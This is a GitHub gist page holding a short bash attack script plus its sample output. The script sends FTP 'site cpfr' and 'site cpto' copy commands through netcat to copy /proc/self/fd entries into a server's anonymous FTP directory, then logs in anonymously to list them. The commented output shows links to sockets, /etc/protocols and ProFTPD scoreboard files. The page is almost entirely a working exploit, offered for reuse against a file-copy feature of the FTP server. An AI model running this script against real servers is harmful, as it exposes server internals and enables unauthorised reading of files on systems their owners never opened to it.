Skip to content

Instantly share code, notes, and snippets.

@tanaka-geek

tanaka-geek/enumerate.sh

Last active May 14, 2021 06:05
Show Gist options
  • Save tanaka-geek/ce8ef6aa5f0a96dc3d6170b08fa5d267 to your computer and use it in GitHub Desktop.
Save tanaka-geek/ce8ef6aa5f0a96dc3d6170b08fa5d267 to your computer and use it in GitHub Desktop.
Download ZIP
file descriptor exposure via FTP and Netcat : site command has to be enabled
Raw
enumerate.sh
#!/bin/bash
IP="192.168.1.1"
PORT=21
USER="anonymous"
PASSWD="whatever"
FTP_DIR="/home/ftp"
function Enumerate {
for i in `seq 1 16`;do # you can change seq if there's more services are running but usually < 16
(echo "site cpfr /proc/self/fd/${i}"; echo "site cpto $FTP_DIR/proc${i}";echo 'quit') | nc $IP $PORT
done
}
function Invoke_ftp {
ftp -n $IP <<EOF
quote USER $USER
quote PASS $PASSWD
ls
EOF
}
Enumerate
Invoke_ftp
#lrwxrwxrwx 1 0 0 15 Apr 26 04:34 proc1 -> socket:[717432]
#lrwxrwxrwx 1 0 0 14 Apr 26 04:34 proc3 -> /etc/protocols
#lrwxrwxrwx 1 0 0 15 Apr 26 04:34 proc4 -> socket:[717484]
#lrwxrwxrwx 1 0 0 37 Apr 26 04:34 proc5 -> /usr/local/var/proftpd.scoreboard.lck
#lrwxrwxrwx 1 0 0 28 Apr 26 04:34 proc6 -> /usr/local/var/proftpd.delay
#lrwxrwxrwx 1 0 0 33 Apr 26 04:34 proc7 -> /usr/local/var/proftpd.scoreboard
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment